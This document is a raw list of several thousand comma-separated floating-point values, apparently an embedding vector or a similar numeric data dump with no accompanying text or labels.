-0.0025499502662569284, -0.021523989737033844, 0.024678116664290428, 0.004701984114944935, 0.019158395007252693, -0.012689516879618168, 0.03104477748274803, 0.0010103060631081462, -0.0005174737889319658, -0.016646776348352432, 0.0029077099170535803, -0.016836607828736305, -0.006370312534272671, -0.03560073673725128, 0.04112045839428902, -0.003939006943255663, 0.0018873647786676884, 0.01617949828505516, 0.0014392525190487504, 0.004610719159245491, 0.008513219654560089, 0.005607335362583399, -0.0017605061875656247, 0.029788969084620476, -0.024590501561760902, -0.023874981328845024, -0.0012768004089593887, -0.02558346651494503, 0.01851588860154152, -0.03796633332967758, -0.016807403415441513, -0.014003735966980457, 0.00602350477129221, -0.0133904330432415, 0.0007310344371944666, -0.014018338173627853, 0.029292486608028412, 0.0023199620191007853, -0.019158395007252693, -0.007987531833350658, 0.0027689868584275246, -0.014405302703380585, -0.025481250137090683, -0.018311453983187675, -0.005483214743435383, -0.03662290796637535, 0.015960462391376495, -0.006698867306113243, 0.029730558395385742, 0.022093484178185463, 0.012375564314424992, 0.02045801281929016, 0.028036676347255707, 0.014178965240716934, -0.01983010768890381, -0.015960462391376495, -0.0024805888533592224, 0.021976664662361145, -0.04074079543352127, -0.0019165696576237679, 0.014098651707172394, 0.0367981381714344, -0.019026974216103554, 0.00010307266347808763, -0.011762261390686035, 0.010922621935606003, -0.010280114598572254, -0.006801084149628878, 0.0017751086270436645, 0.0005466786678880453, 0.0075567602179944515, 0.030051812529563904, -0.026240576058626175, 0.0038075849879533052, -0.00532988877967, -0.0196840837597847, 0.0007155193598009646, 0.006585698574781418, -0.014062145724892616, -0.017756560817360878, -0.019158395007252693, -0.043456848710775375, -0.0120689133182168, 0.006041757762432098, -0.005505118053406477, -0.009973463602364063, 0.009411269798874855, 0.024035608395934105, 0.020764663815498352, -0.029496919363737106, 0.020852278918027878, 0.0010376855498179793, -0.0036104521714150906, -0.01029471680521965, -0.010389632545411587, -0.009915053844451904, -0.025028575211763382, 0.006461577955633402, -0.018209237605333328, -0.002633914351463318, -0.022969631478190422, 0.011652743443846703, 0.01287934836000204, 0.007067578844726086, 0.016982631757855415, -0.017595935612916946, 0.025408238172531128, 0.018267646431922913, -0.04407015070319176, -0.0032326141372323036, -0.015069713816046715, -0.03247581794857979, -0.004891816060990095, -0.0033676866441965103, 0.01324440911412239, 0.00602350477129221, -0.049911126494407654, 0.0061987340450286865, 0.03907611593604088, -0.015683015808463097, -0.010389632545411587, -0.013631373643875122, -0.02057483233511448, -0.014449110254645348, 0.03495823219418526, 0.006436023395508528, 0.01037503033876419, -0.021976664662361145, 0.024882549419999123, 0.019494252279400826, -0.02310105226933956, 0.01463894173502922, -0.002940565347671509, 0.01972789131104946, 0.001956726424396038, -0.017756560817360878, -0.00639951741322875, 0.009425872005522251, 0.003990115597844124, -0.007414386607706547, -0.010155993513762951, -0.028051279485225677, -0.024196235463023186, -0.0015807136660441756, 0.016223305836319923, 0.02075006067752838, -0.027452578768134117, 0.0008528734906576574, -0.0064469752833247185, 0.02307184785604477, -0.015639208257198334, -0.007936423644423485, -0.0344325415790081, -0.0076078688725829124, 0.024167031049728394, 0.010170596651732922, 0.0136678796261549, 0.009571896865963936, -0.02204967848956585, 0.027379566803574562, 0.03586358204483986, 0.018486684188246727, -0.010163295082747936, -0.006527288816869259, -0.002712402492761612, -0.012185732834041119, 0.005851926282048225, 0.013091083616018295, -0.025481250137090683, 0.005811769515275955, 0.01530335284769535, 0.011900984682142735, 0.0026667697820812464, 0.0048297555185854435, 0.0010349475778639317, 0.0038951996248215437, 0.007629772648215294, -0.04634813219308853, 0.02060403674840927, -0.015376364812254906, -0.012178431265056133, 0.019362829625606537, 0.0564822219312191, -0.004471995867788792, -0.010557561181485653, 0.009462377987802029, -0.004745791666209698, 0.014427206479012966, 0.005446708295494318, 0.008301484398543835, 0.013127589598298073, -0.030840344727039337, 0.024444477632641792, -0.007768495939671993, 0.037849511951208115, -0.03428651764988899, 0.007571362890303135, -0.008243074640631676, -0.005917637143284082, -0.0320669487118721, -0.0019384733168408275, 0.012667613103985786, -0.010667079128324986, -0.04541357606649399, -0.034023676067590714, -0.01294505875557661, -0.002891282318159938, -0.006760927848517895, -0.01116356160491705, 0.027846844866871834, 0.004304067697376013, 0.014076747931540012, -0.005486865062266588, 0.013930723071098328, -0.007144241593778133, -0.01073279045522213, 0.014441808685660362, -0.03250502049922943, -0.004877213388681412, -0.004512152634561062, 0.0010915320599451661, -0.012616503983736038, 0.0007063928060233593, 0.003738223575055599, -0.00897319708019495, 0.030343860387802124, -0.023451510816812515, -0.004552309401333332, -0.01000996958464384, -0.00030003441497683525, -0.007399784401059151, -0.008797967806458473, -0.018326057121157646, 0.003019053488969803, -0.02898583374917507, 0.008067845366895199, -0.012762528844177723, -0.008002134971320629, -0.0059249382466077805, 0.09193693101406097, -0.0008350767893716693, -0.007261061109602451, -0.021261146292090416, -0.03571755811572075, -0.016573764383792877, 0.0002448189479764551, -0.008206568658351898, 0.0315120555460453, -0.0027178784366697073, 0.008411003276705742, 0.017011838033795357, -0.030256247147917747, 0.04071158915758133, 0.003880597185343504, 0.020341193303465843, -0.013792000710964203, -0.023422306403517723, 0.023349294438958168, -0.017873380333185196, 0.007071229629218578, 0.028182700276374817, -0.0015679365023970604, -0.01619410142302513, 0.037265416234731674, -0.017727356404066086, -0.001862723147496581, -0.02453209087252617, -0.04100364074110985, 0.0013224331196397543, 0.014390700496733189, 0.023436909541487694, -0.004625321365892887, -0.022750593721866608, -0.00009662705269875005, 0.010842308402061462, 0.009330956265330315, 0.00838909950107336, -0.008790666237473488, -0.02676626481115818, -0.019319022074341774, -0.011995900422334671, -0.022122690454125404, 0.0011362520745024085, -0.0010751043446362019, 0.011054043658077717, 0.016953427344560623, 0.0003543372149579227, -0.02204967848956585, 0.019012371078133583, 0.0005640190793201327, -0.008418303914368153, 0.009126522578299046, 0.012565395794808865, 0.02045801281929016, -0.004862611182034016, -0.01765434443950653, -0.0029004088137298822, -0.008243074640631676, -0.010667079128324986, -0.0017741959309205413, 0.012550793588161469, -0.012025105766952038, 0.013215203769505024, 0.005625588353723288, 0.006100167520344257, -0.029788969084620476, -0.016383932903409004, -0.02469271793961525, 0.00653824070468545, 0.02426924742758274, 0.007282964885234833, -0.0026393902953714132, 0.005391949322074652, -0.0143980011343956, -0.02133415825664997, -0.008345291949808598, 0.025349827483296394, -0.020647844299674034, -0.0169388260692358, 0.0023674198891967535, 0.0039061515126377344, 0.01823844201862812, 0.005979697220027447, -0.013616771437227726, 0.031395237892866135, -0.01615029387176037, -0.031249212101101875, 0.0024805888533592224, 0.005537973716855049, -0.018034007400274277, -0.016705187037587166, 0.01718706637620926, 0.011294984258711338, 0.013237107545137405, 0.011835274286568165, 0.00539925042539835, 0.0007958327187225223, -0.010126789100468159, -0.027905253693461418, 0.015463978983461857, 0.00200235890224576, -0.015244943089783192, -0.013039975427091122, -0.01853048987686634, 0.0062644449062645435, 0.01388691645115614, 0.010564861819148064, -0.009659511037170887, -0.019216805696487427, -0.002617486519739032, -0.01571222022175789, -0.009279848076403141, -0.03335196152329445, -0.0010760169243440032, 0.001356201246380806, 0.004351526033133268, -0.001956726424396038, -0.027905253693461418, -0.03384844586253166, -0.030811138451099396, 0.002770812250673771, 0.018063213676214218, -0.03221297264099121, 0.005738757085055113, 0.025831708684563637, 0.023874981328845024, -0.009637607261538506, 0.02148018218576908, -0.007315820083022118, 0.014091350138187408, 0.008666545152664185, 0.006549192126840353, -0.01629631780087948, 0.0006379439146257937, -0.0036031510680913925, 0.015084316022694111, 0.03650609031319618, -0.02188905142247677, 0.004563261289149523, -0.011995900422334671, 0.02482414059340954, -0.013718987815082073, 0.03130762279033661, 0.01676359586417675, 0.003865994745865464, 0.010499151423573494, -0.0024696369655430317, 0.008549725636839867, 0.016997234895825386, 0.025671081617474556, -0.03268025070428848, 0.003924404736608267, 0.009447775781154633, 0.003632355947047472, -0.030548295006155968, 0.042142629623413086, -0.004858960397541523, -0.008279580622911453, 0.02000533603131771, -0.007520254235714674, -0.0010760169243440032, 0.01942123845219612, -0.012996167875826359, 0.001247595646418631, 0.027905253693461418, -0.011557827703654766, 0.002115527866408229, -0.02793445996940136, 0.0033658614847809076, 0.010039173997938633, 0.0031614273320883512, -0.025963131338357925, -0.013806602917611599, 0.010944525711238384, 0.018063213676214218, 0.0018152652774006128, 0.004939273931086063, 0.030665114521980286, -0.002341865561902523, -0.009571896865963936, 0.0011590683134272695, 0.002498841844499111, -0.013952626846730709, -0.017172465100884438, -0.004139790311455727, 0.0014775838935747743, 0.012032407335937023, -0.03259263560175896, 0.00992235541343689, 0.0050779967568814754, 0.04810042306780815, -0.02923407591879368, -0.04223024472594261, 0.017990199849009514, -0.01572682335972786, -0.010192500427365303, -0.02191825583577156, -0.013185999356210232, -0.009834740310907364, -0.006143974605947733, -0.018165430054068565, 0.011338790878653526, 0.008067845366895199, -0.005424804985523224, -0.033906854689121246, -0.033585600554943085, 0.022575365379452705, 0.013945326209068298, -0.006709819193929434, 0.008118954487144947, 0.005881130695343018, -0.00015401006385218352, 0.0036615608260035515, 0.022838208824396133, -0.01000996958464384, -0.02219570241868496, -0.006282697897404432, -0.01544937677681446, -0.0006242541130632162, -0.007812303025275469, -0.005282430909574032, -0.000466593453893438, -0.0032891985028982162, -0.013689783401787281, -0.00445009209215641, 0.014405302703380585, -0.012521588243544102, -0.004968478810042143, -0.005895733367651701, -0.026883084326982498, -0.0035283134784549475, -0.0006123896455392241, 0.01661757193505764, -0.007396133616566658, -0.01000996958464384, 0.001940298592671752, 0.0004586077411659062, 0.0034899821039289236, 0.0004321408341638744, 0.009520787745714188, -0.018121622502803802, -0.03796633332967758, -0.016398536041378975, 0.01433959137648344, -0.00031874378328211606, -0.011667345650494099, 0.020341193303465843, -0.009579197503626347, -0.0029624691233038902, -0.003971862606704235, 0.008724954910576344, 0.009206835180521011, -0.007264711894094944, -0.011696550995111465, 0.002980722114443779, -0.015595401637256145, -0.03746984899044037, -0.012455877847969532, -0.04322320967912674, 0.03676893189549446, -0.0215970017015934, -0.02616756409406662, 0.022735992446541786, -0.01081310398876667, 0.013616771437227726, 0.015113520435988903, 0.00890018418431282, 0.005833672825247049, 0.0061147697269916534, -0.003000800497829914, 0.009082715027034283, 0.002214094391092658, -0.008367195725440979, -0.010418837890028954, -0.006611252669245005, 0.010725488886237144, 0.0016035299049690366, 0.009455077350139618, 0.0076151699759066105, -0.008491315878927708, 0.029496919363737106, 0.0019110937137156725, -0.012893950566649437, 0.008491315878927708, -0.009425872005522251, -0.03349798545241356, -0.003535614814609289, -0.007578663993626833, -0.014726555906236172, 0.004701984114944935, 0.005063394550234079, 0.004534056410193443, -0.03174569457769394, 0.003218011697754264, -0.014142459258437157, -0.0010258210822939873, 0.030665114521980286, 0.006669662427157164, 0.00033517152769491076, 0.005176563281565905, 0.010265512391924858, -0.0017659820150583982, -0.011127055622637272, -0.016997234895825386, -0.0012612853897735476, -0.01747911609709263, -0.01629631780087948, 0.007315820083022118, -0.0037108438555151224, -0.00867384672164917, 0.0010385982459411025, -0.03703177720308304, 0.0015058761928230524, 0.007797700818628073, -0.0012302552349865437, -0.013938024640083313, 0.024050211533904076, -0.0076735797338187695, -0.004723887890577316, -0.003756476566195488, 0.007731989491730928, -0.007622471544891596, -0.011221971362829208, -0.0059979502111673355, 0.005340840667486191, -0.012959661893546581, 0.0008775151218287647, -0.017712755128741264, -0.004391682334244251, 0.026532625779509544, 0.017975598573684692, 0.03224217891693115, 0.02221030369400978, 0.0010048301192000508, 0.010820404626429081, 0.029599137604236603, -0.01574142463505268, -0.01528874970972538, 0.009009703062474728, -0.04135409742593765, 0.034929025918245316, -0.005895733367651701, 0.020808471366763115, 0.03174569457769394, 0.00562923913821578, 0.016705187037587166, -0.001067803124897182, -0.015639208257198334, -0.0198593121021986, -0.006363011430948973, -0.005088948644697666, 0.011565129272639751, 0.007637073751538992, -0.00024595975992269814, 0.0215970017015934, -0.003011752385646105, -0.007228205446153879, 0.015128123573958874, -0.011316887103021145, 0.005391949322074652, -0.013229806907474995, -0.01749371737241745, 0.008929389528930187, 0.01896856352686882, -0.033731624484062195, 0.0005959619302302599, -0.0007228205795399845, 0.01168924942612648, -0.004931972827762365, 0.02190365269780159, -0.005826371721923351, 0.021874448284506798, -0.02234172634780407, 0.012828239239752293, -0.0036141027230769396, 0.04456663504242897, -0.01485797856003046, -0.02072085626423359, 0.029453111812472343, -0.006392216309905052, -0.001282276352867484, -0.0027525590267032385, -0.013653277419507504, -0.005877480376511812, 0.01035312656313181, -0.00831608660519123, -0.013061878271400928, -0.03177490085363388, -0.0035246629267930984, 0.013047276064753532, -0.011083249002695084, 0.02441527135670185, 0.03598039969801903, 0.004921020939946175, 0.004716586787253618, -0.011842574924230576, 0.0026868481654673815, -0.015522388741374016, -0.007826905697584152, -0.013697084970772266, -0.01463894173502922, -0.0009048946667462587, 0.017595935612916946, 0.013185999356210232, 0.00022964611707720906, -0.012813637033104897, -0.03600960597395897, 0.026269782334566116, -0.0021648111287504435, 0.024298453703522682, -0.006089215632528067, -0.02732115611433983, -0.006133022718131542, -0.01433229073882103, -0.0196840837597847, 0.005501467734575272, 0.040069084614515305, 0.021275749430060387, -0.01777116395533085, 0.010477247647941113, -0.012448576278984547, -0.017230873927474022, -0.011798768304288387, -0.013207903131842613, 0.007246458437293768, -0.01550778653472662, 0.006892349570989609, -0.018880948424339294, 0.005209418945014477, -0.008337990380823612, 0.012236841022968292, 0.0010851435363292694, -0.015405569225549698, 0.010250910185277462, 0.014434507116675377, -0.008462111465632915, 0.006647758651524782, -0.009535390883684158, 0.017157861962914467, 0.005972396116703749, -0.007355976849794388, 0.009506185539066792, -0.012156527489423752, 0.0010532006854191422, 0.0018253044690936804, 0.003460777224972844, 0.0027799387462437153, -0.020516421645879745, -0.008403701707720757, 0.024006403982639313, 0.0023290885146707296, 0.010338524356484413, 0.011660045012831688, -0.014770363457500935, -0.0031030175741761923, 0.0009172154823318124, -0.005757010076195002, 0.013938024640083313, -0.006107468623667955, -0.003172379219904542, -0.013616771437227726, 0.007115036714822054, -0.004658177029341459, 0.0251453947275877, 0.006483481265604496, 0.005680347327142954, -0.000705480168107897, -0.013412336818873882, -0.012915854342281818, 0.0010504627134650946, -0.006487132050096989, 0.014682749286293983, 0.010236307047307491, 0.022969631478190422, 0.013047276064753532, -0.01629631780087948, -0.0063155535608530045, -0.006797433830797672, 0.007158844266086817, 0.009936957620084286, 0.031804103404283524, -0.010908019728958607, -0.0035684702452272177, 0.008644642308354378, 0.012200335040688515, -0.005377347115427256, 0.0031614273320883512, 0.002345516113564372, -0.01780036836862564, -0.001905617886222899, -0.02016596309840679, 0.012112719938158989, 0.0007921821088530123, 0.017289284616708755, 0.012397468090057373, 0.016865812242031097, 0.029482318088412285, 0.015084316022694111, 0.016792800277471542, -0.011747659184038639, -0.003756476566195488, -0.01914379373192787, -0.002159335184842348, 0.013120288029313087, -0.020939892157912254, -0.017245477065443993, 0.010207102634012699, 0.01854509301483631, -0.01880793645977974, 0.006089215632528067, -0.014690049923956394, -0.012448576278984547, -0.009053509682416916, -0.0023710704408586025, 0.006246191915124655, -0.0022670282050967216, 0.012689516879618168, -0.014383398927748203, -0.011207369156181812, -0.010345825925469398, -0.00047686079051345587, 0.0065053850412368774, -0.021436374634504318, -0.015405569225549698, 0.004906418267637491, 0.004132489208132029, -0.004650875926017761, -0.011791466735303402, -0.018997767940163612, -0.0033603855408728123, 0.005694949999451637, -0.004811502527445555, -0.005483214743435383, 0.01747911609709263, -0.008432906121015549, 0.03457856923341751, -0.00547956395894289, 0.0058081187307834625, 0.0038258382119238377, -0.0006653234595432878, -0.0027416073717176914, -0.00008464849088340998, 0.008965895511209965, -0.008995099924504757, 0.002575504593551159, 0.009068112820386887, -0.014653543941676617, -0.02397719956934452, 0.00025462996563874185, 0.00580446794629097, -0.0005425717681646347, -0.00021150715474504977, 0.008016737177968025, -0.01235366053879261, -0.010820404626429081, -0.008133556693792343, 0.008352593518793583, 0.00022976020409259945, -0.005917637143284082, 0.009652209468185902, 0.027671614661812782, 0.021582400426268578, 0.019289817661046982, 0.00745819415897131, 0.002500667003914714, -0.002716053044423461, -0.014770363457500935, 0.004607068374752998, -0.020326590165495872, 0.0075567602179944515, 0.012747926637530327, -0.0020114853978157043, 0.01491638831794262, 0.008732256479561329, -0.010725488886237144, 0.007812303025275469, -0.011127055622637272, -0.005326238460838795, 0.011521321721374989, -0.006629505660384893, 0.018311453983187675, -0.010155993513762951, -0.010579464957118034, -0.005169262178242207, -0.02294042706489563, -0.0030373067129403353, -0.007790399249643087, -0.005264177918434143, 0.009309052489697933, 0.005716853309422731, -0.0043150195851922035, -0.019070781767368317, 0.009498883970081806, -0.005603684578090906, -0.002902233973145485, -0.01616489700973034, -0.00036711434950120747, 0.0018691117875277996, 0.013762795366346836, 0.006209685932844877, 0.011134357191622257, 0.0029095353092998266, -0.004063127562403679, -0.002836523111909628, -0.010309319943189621, 0.028781400993466377, -0.030373066663742065, 0.00903890747576952, -0.002360118553042412, -0.0016199577366933227, 0.011952093802392483, -0.005625588353723288, -0.00802403874695301, -0.018880948424339294, 0.000769822159782052, -0.013806602917611599, -0.01346344593912363, -0.018121622502803802, -0.023743560537695885, 0.017464512959122658, -0.022414738312363625, 0.00020295103604439646, -0.0075494591146707535, -0.00041480042273178697, 0.004585164599120617, -0.0022159195505082607, -0.014865279197692871, 0.004804201424121857, 0.013733590953052044, 0.01747911609709263, -0.005158310290426016, -0.004946575034409761, -0.003939006943255663, -0.004826104734092951, 0.02634279429912567, -0.0017559428233653307, -0.0016080932691693306, -0.02089608460664749, -0.009425872005522251, -0.008856377564370632, 0.0005256877047941089, -0.019450444728136063, -0.008732256479561329, -0.013879614882171154, -0.007834206335246563, 0.008878280408680439, -0.012258744798600674, 0.008914787322282791, 0.03586358204483986, -0.0019895818550139666, 0.014872580766677856, -0.030665114521980286, -0.006005251780152321, -0.006111119408160448, -0.019757095724344254, 0.005085298325866461, -0.0015788883902132511, -0.00631920387968421, -0.004749441985040903, -0.0038477417547255754, 0.013185999356210232, -0.024356862530112267, 0.0032052346505224705, 0.006184131372720003, -0.008330689743161201, -0.01983010768890381, 0.014215471222996712, -0.009666812606155872, 0.018472081050276756, 0.015493184328079224, -0.011477514170110226, -0.019523456692695618, -0.01781497150659561, -0.0047640446573495865, -0.007060277741402388, 0.017274681478738785, 0.01028741616755724, -0.012426672503352165, 0.007651676423847675, -0.02383117564022541, 0.004384381230920553, 0.0031577767804265022, 0.004899117164313793, -0.016106486320495605, -0.010126789100468159, 0.007290265988558531, -0.002973421011120081, 0.001982280518859625, -0.010316620580852032, -0.0000719283998478204, 0.006107468623667955, 0.026357395574450493, -0.003971862606704235, -0.012740625068545341, -0.05341570824384689, -0.005658443551510572, 0.004329622257500887, -0.012711419723927975, 0.011411803774535656, 0.010579464957118034, -0.005191165953874588, -0.003300150390714407, -0.0031851562671363354, -0.006808385718613863, 0.0011590683134272695, 0.00903890747576952, -0.0020078348461538553, 0.015390967018902302, 0.013901518657803535, 0.011966696009039879, -0.013434240594506264, 0.014682749286293983, -0.0002416246716165915, -0.011032139882445335, 0.020034542307257652, -0.007695483509451151, 0.026196768507361412, 0.022122690454125404, 0.012426672503352165, -0.03399446979165077, -0.0059395404532551765, 0.017727356404066086, -0.02352452278137207, 0.0026065348647534847, 0.006370312534272671, 0.02765701338648796, -0.01110515184700489, -0.01835526153445244, -0.0031705538276582956, 0.003221662249416113, 0.00986394565552473, 0.034169699996709824, -0.0065966504625976086, -0.000016541822333238088, 0.0032490419689565897, -0.001828042441047728, -0.026240576058626175, -0.012645709328353405, -0.006822987925261259, 0.02440067008137703, -0.009571896865963936, -0.021801436319947243, -0.008739558048546314, 0.008264978416264057, 0.011411803774535656, -0.0024185283109545708, 0.02012215554714203, -0.00745819415897131, 0.009549993090331554, -0.021261146292090416, 0.012207635678350925, -0.016836607828736305, -0.007505652029067278, 0.013310120441019535, -0.005147358402609825, -0.010966429486870766, 0.007104084827005863, -0.009236040525138378, 0.0004373885749373585, 0.01972789131104946, 0.018150826916098595, 0.004691032227128744, 0.013273613527417183, 0.01705564558506012, 0.029336292296648026, -0.0014529423788189888, -0.004720237106084824, -0.012667613103985786, -0.0009363811695948243, 0.004048525355756283, 0.0059906491078436375, 0.03232979401946068, 0.0003493176482152194, 0.014047542586922646, 0.008060544729232788, 0.010090283118188381, -0.010893416590988636, 0.007987531833350658, -0.021115122362971306, -0.0079291220754385, -0.009301751852035522, -0.023188667371869087, 0.014711953699588776, 0.03323514387011528, 0.006060010753571987, -0.009060811251401901, -0.006771879270672798, 0.014894484542310238, -0.005187515169382095, 0.017084849998354912, -0.002361943945288658, 0.00890018418431282, 0.012339058332145214, -0.011857178062200546, -0.008695750497281551, 0.010236307047307491, 0.012733323499560356, 0.005443057976663113, -0.004464694764465094, -0.0004896378959529102, -0.028022073209285736, -0.00485530961304903, 0.00532988877967, 0.015697618946433067, 0.02558346651494503, 0.004143441095948219, 0.01338313240557909, -0.0010860561160370708, -0.014463712461292744, -0.003323879325762391, 0.001371716265566647, -0.016953427344560623, 0.0049538761377334595, -0.021421773359179497, -0.005691299214959145, 0.00016382106696255505, -0.00488451449200511, 0.030373066663742065, 0.004672779235988855, 0.0021830641198903322, -0.018953962251544, 0.020662445574998856, -0.006611252669245005, 0.008060544729232788, -0.023042643442749977, 0.008403701707720757, -0.02235632948577404, 0.007173446472734213, -0.01750832051038742, -0.004205501638352871, -0.004530405625700951, 0.009133823215961456, -0.006045408546924591, -0.020078347995877266, -0.00772468838840723, -0.022108087316155434, 0.008264978416264057, -0.009206835180521011, 0.008688448928296566, -0.007710086181759834, 0.0043150195851922035, 0.026795469224452972, 0.003475379664450884, -0.008257677778601646, -0.019172998145222664, -0.0031048429664224386, -0.0059249382466077805, 0.012339058332145214, -0.016062678769230843, 0.0003582159988582134, -0.005202117841690779, -0.010090283118188381, 0.00852782279253006, 0.026999903842806816, 0.0006634981837123632, -0.0011681948089972138, -0.012076213955879211, -0.03162887692451477, -0.0030701621435582638, 0.01544937677681446, 0.01221493724733591, 0.017260078340768814, 0.0010020921472460032, 0.01140450220555067, -0.021392568945884705, -0.0033567349892109632, -0.004329622257500887, -0.019903119653463364, -0.014755761250853539, 0.01835526153445244, 0.0016893192660063505, 0.007921821437776089, 0.018150826916098595, 0.02146558091044426, -0.013485349714756012, -0.004453742876648903, -0.015580798499286175, -0.027291951701045036, 0.013675181195139885, 0.015595401637256145, -0.0062571438029408455, -0.013507252559065819, 0.018340658396482468, 0.0036141027230769396, 0.0009555468568578362, 0.014602435752749443, 0.007622471544891596, -0.001196487108245492, -0.01101753767579794, -0.027992868795990944, 0.016968030482530594, -0.018004802986979485, 0.021085916087031364, 0.033468782901763916, 0.008695750497281551, 0.0038404406514018774, -0.011075947433710098, -0.002318136626854539, -0.005242274142801762, -0.012682215310633183, -0.0013762795133516192, -0.014653543941676617, 0.022108087316155434, 0.0015834516379982233, 0.01411325391381979, 0.008301484398543835, -0.027613205835223198, 0.00005875198621652089, -0.0015113521367311478, -0.006461577955633402, 0.01869111694395542, 0.016062678769230843, -0.005556226707994938, 0.002084497595205903, -0.009148425422608852, -0.02571488916873932, -0.005311635788530111, -0.004592466168105602, 0.008805268444120884, 0.021363362669944763, 0.009915053844451904, -0.008724954910576344, 0.009827438741922379, 0.017566729336977005, 0.016792800277471542, 0.02248775027692318, -0.015814438462257385, -0.016091883182525635, 0.007042024750262499, 0.004910069052129984, 0.00013575701450463384, 0.009944258257746696, -0.010922621935606003, -0.018282249569892883, 0.0030227042734622955, -0.010155993513762951, -0.012448576278984547, -0.005446708295494318, -0.003172379219904542, -0.0019494252046570182, -0.00934555847197771, -0.007972929626703262, -0.004329622257500887, -0.02425464615225792, -0.021407170221209526, 0.00010341490269638598, -0.003320228774100542, 0.026357395574450493, 0.012813637033104897, -0.017464512959122658, -0.0003169184783473611, -0.01403294038027525, -0.015683015808463097, -0.03510425612330437, 0.0076078688725829124, -0.025203803554177284, 0.018953962251544, 0.015931257978081703, -0.008922087959945202, -0.018150826916098595, 0.014237374998629093, 0.00580446794629097, 0.016661379486322403, 0.019377432763576508, 0.0034516507294028997, -0.024167031049728394, 0.00962300505489111, -0.014186265878379345, 0.013346626423299313, 0.00031098624458536506, -0.01763974130153656, 0.01572682335972786, -0.02603614330291748, 0.020195167511701584, 0.013112987391650677, 0.006147625390440226, 0.0060344566591084, -0.03013942763209343, -0.005811769515275955, -0.011433706618845463, -0.0021648111287504435, -0.024021007120609283, 0.012704119086265564, -0.025992335751652718, -0.004333272576332092, -0.004986731801182032, 0.026284383609890938, 0.010615970939397812, -0.010002668015658855, -0.007323121652007103, -0.00956459529697895, 0.03159967064857483, -0.01101753767579794, 0.022283317521214485, -0.004267561715096235, 0.016077281907200813, -0.020136758685112, 0.003928055055439472, -0.022838208824396133, 0.010521055199205875, -0.004793249536305666, -0.001013043918646872, 0.005406551994383335, -0.001726738060824573, -0.007739291060715914, -0.0015323430998250842, 0.01836986467242241, 0.013580265454947948, -0.006147625390440226, 0.00934555847197771, 0.016281716525554657, -0.004610719159245491, 0.02088148333132267, 0.007410735823214054, 0.010185198858380318, -0.021553194150328636, 0.019479649141430855, 0.021494785323739052, -0.008279580622911453, -0.015770630910992622, 0.0004996770876459777, -0.007085831835865974, 0.0029898486100137234, -0.007454543374478817, -0.013310120441019535, -0.00984934251755476, -0.03869645297527313, 0.013332023285329342, 0.013959928415715694, 0.003865994745865464, -0.0013552885502576828, 0.011397200636565685, 0.02644501067698002, 0.003066511359065771, 0.04395332932472229, 0.00043077184818685055, 0.004961177706718445, -0.002688673557713628, -0.013536457903683186, -0.00970331858843565, -0.02426924742758274, -0.027394169941544533, 0.005118153523653746, -0.0009213224402628839, 0.0025809805374592543, -0.02237093076109886, -0.0010623271809890866, 0.0017084849532693624, 0.013835807330906391, -0.010761994868516922, 0.0002911360643338412, -0.02866458147764206, -0.023626741021871567, 0.020472614094614983, 0.017318489030003548, 0.004406285006552935, 0.008323388174176216, 0.01536176260560751, 0.007436290383338928, -0.026532625779509544, -0.005797166842967272, 0.006881397683173418, -0.002420353703200817, 0.01997613161802292, -0.001866373815573752, -0.020224373787641525, -0.007188048679381609, 0.010542958043515682, 0.0016847560182213783, 0.024196235463023186, 0.020355794578790665, -0.009893150068819523, -0.006749975960701704, 0.010710886679589748, 0.0008839037036523223, -0.017698151990771294, -0.023933392018079758, 0.0003796633391175419, -0.010783898644149303, -0.024488285183906555, -0.008301484398543835, 0.020399602130055428, -0.0025663780979812145, -0.00514370808377862, 0.006728072185069323, 0.009294450283050537, 0.0033804639242589474, 0.010046475566923618, 0.007129639387130737, -0.008162761107087135, -0.01514272578060627, -0.005253226030617952, 0.009163028560578823, -0.009411269798874855, -0.033176735043525696, 0.026503421366214752, -0.002434956142678857, 0.019289817661046982, -0.016573764383792877, -0.011813370510935783, 0.013733590953052044, 0.025057779625058174, 0.04085761308670044, -0.016267113387584686, -0.007290265988558531, -0.027861446142196655, 0.020910687744617462, -0.003530138870701194, -0.015201135538518429, -0.012112719938158989, -0.009440474212169647, -0.007220904342830181, -0.007399784401059151, -0.031073983758687973, -0.0040594772435724735, -0.01257269736379385, -0.010630573146045208, -0.019640276208519936, -0.016383932903409004, 0.00003793210635194555, -0.03165807947516441, 0.015858244150877, -0.004523104522377253, 0.01720166951417923, -0.003577596740797162, -0.0029788969550281763, 0.01162353903055191, 0.023305486887693405, -0.022122690454125404, 0.01864730939269066, -0.030694318935275078, -0.025379033759236336, 0.03411129117012024, 0.0183990690857172, 0.006476180162280798, -0.012485082261264324, 0.005702251102775335, -0.006801084149628878, 0.022867413237690926, 0.0029332642443478107, -0.0032983252312988043, 0.006377613637596369, -0.011251176707446575, -0.0015414695953950286, 0.0006621291977353394, -0.020341193303465843, 0.003667036537081003, 0.01869111694395542, -0.002360118553042412, -0.027613205835223198, -0.007144241593778133, 0.009871246293187141, -0.011747659184038639, 0.008863678202033043, 0.0034078434109687805, -0.009491583332419395, 0.0009135648724623024, 0.029642943292856216, 0.010119487531483173, 0.0031906322110444307, -0.0041908989660441875, 0.0012056136038154364, 0.005238623823970556, 0.011579731479287148, -0.0017915363423526287, 0.010966429486870766, 0.017902586609125137, -0.0015524214832112193, -0.000020235211195540614, -0.02291122078895569, 0.0074910493567585945, 0.011864478699862957, 0.030986368656158447, 0.007921821437776089, -0.006227938923984766, -0.0016820180462673306, 0.007012819871306419, 0.005249575711786747, 0.015215737745165825, -0.015610003843903542, -0.010754694230854511, -0.001282276352867484, 0.019523456692695618, -0.006384914740920067, -0.007049325853586197, 0.0012740625534206629, -0.004388032015413046, 0.012769829481840134, 0.018895551562309265, -0.02279440127313137, -0.009995367377996445, 0.0013854061253368855, 0.013813904486596584, 0.004147091880440712, -0.04003987833857536, -0.008359894156455994, -0.0044975499622523785, 0.02279440127313137, -0.014164362102746964, 0.013134891167283058, 0.029628342017531395, 0.005903034470975399, 0.01300346851348877, -0.03510425612330437, 0.017756560817360878, -0.0001862951321527362, 0.010608669370412827, 0.009557293727993965, 0.0022706787567585707, -0.0023947993759065866, 0.004672779235988855, -0.0009555468568578362, 0.017902586609125137, -0.011813370510935783, 0.007907219231128693, 0.0011681948089972138, 0.005194816272705793, -0.0014429031871259212, -0.004734839778393507, -0.0024659864138811827, -0.02397719956934452, -0.0036889403127133846, -0.003876946633681655, -0.008863678202033043, 0.004552309401333332, -0.02955533005297184, 0.007856110110878944, 0.00539925042539835, 0.03370242193341255, -0.016836607828736305, -0.01647154800593853, 0.004428188782185316, -0.0047640446573495865, 0.0014593309024348855, -0.020355794578790665, 0.005877480376511812, 